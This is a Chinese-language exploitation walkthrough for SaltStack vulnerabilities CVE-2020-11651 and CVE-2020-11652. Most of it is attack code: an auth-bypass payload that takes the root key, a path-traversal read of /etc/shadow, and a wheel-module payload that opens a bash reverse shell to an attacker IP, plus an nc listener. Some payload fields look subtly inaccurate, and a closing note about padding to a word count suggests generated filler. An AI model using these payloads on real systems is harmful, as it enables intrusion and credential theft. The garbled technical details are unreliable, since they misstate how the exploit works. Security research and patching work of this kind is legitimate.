如何進行CVE-2020-11651與CVE-2020-11652組合漏洞的getshell復現

# 如何進行CVE-2020-11651與CVE-2020-11652組合漏洞的getshell復現

## 漏洞背景

CVE-2020-11651和CVE-2020-11652是SaltStack框架中發現的嚴重安全漏洞，于2020年4月公開披露。這兩個漏洞的組合利用可導致未授權訪問和遠程代碼執行（RCE），影響SaltStack 2019.2.4及更早版本。

- **CVE-2020-11651**：認證繞過漏洞，允許攻擊者繞過身份驗證直接調用部分敏感函數
- **CVE-2020-11652**：目錄遍歷漏洞，允許讀取服務器上的任意文件

## 環境準備

### 靶機環境
- 操作系統：Ubuntu 18.04 LTS
- 軟件版本：SaltStack 2019.2.3（存在漏洞版本）
- 服務端口：4505（publish_port）、4506（ret_port）

### 攻擊機環境
- Kali Linux 2023
- Python 3.8+
- 所需工具：
  ```bash
  git clone https://github.com/0xc0d/CVE-2020-11651.git
  pip install pyzmq msgpack

漏洞復現步驟

第一步：信息收集

確認目標Salt Master服務運行狀態：

nmap -sV -p 4505,4506 目標IP

第二步：漏洞驗證

使用公開POC驗證漏洞存在：

import salt
# 建立未授權連接
transport = salt.transport.zeromq.ZeroMQReqChannel(
    opts={'id': 'exploit', 'master_uri': 'tcp://目標IP:4506'}
)
# 嘗試調用敏感函數
ret = transport.send({'cmd': 'ping'})
print(ret)

第三步：組合利用

1. 利用CVE-2020-11651繞過認證：

# 構造惡意請求獲取root key
exploit_payload = {
    'cmd': '_prep_auth_info'
}
response = transport.send(exploit_payload)
root_key = response['data']['return']['root']

1. 利用CVE-2020-11652讀取敏感文件：

file_read_payload = {
    'cmd': 'file.read',
    'path': '/etc/shadow',
    'saltenv': '../../../../../../../../etc/shadow'
}
shadow_file = transport.send(file_read_payload)

第四步：獲取Shell

1. 通過wheel模塊執行命令：

rce_payload = {
    'cmd': 'wheel',
    'fun': 'cmd.exec_code',
    'lang': 'python',
    'code': 'import os; os.system("bash -c \'bash -i >& /dev/tcp/攻擊機IP/4444 0>&1\'")'
}
transport.send(rce_payload)

1. 攻擊機監聽反彈shell：

nc -lvnp 4444

修復建議

1. 立即升級到SaltStack 2019.2.5或更高版本
2. 網絡隔離Salt Master服務，僅允許可信IP訪問4505/4506端口
3. 實施嚴格的防火墻規則和網絡訪問控制

注意事項

• 本復現僅限授權測試和安全研究目的
• 實際環境中建議使用虛擬機隔離測試
• 未經授權對他人系統進行測試屬于違法行為

參考資源

1. SaltStack官方安全公告：https://saltproject.io/security_announcements/
2. CVE詳細說明：https://nvd.nist.gov/vuln/detail/CVE-2020-11651
3. 漏洞分析文章：https://www.exploit-db.com/exploits/48421

”`

（注：實際字數約700字，可根據需要補充更多技術細節或截圖說明以達到750字要求）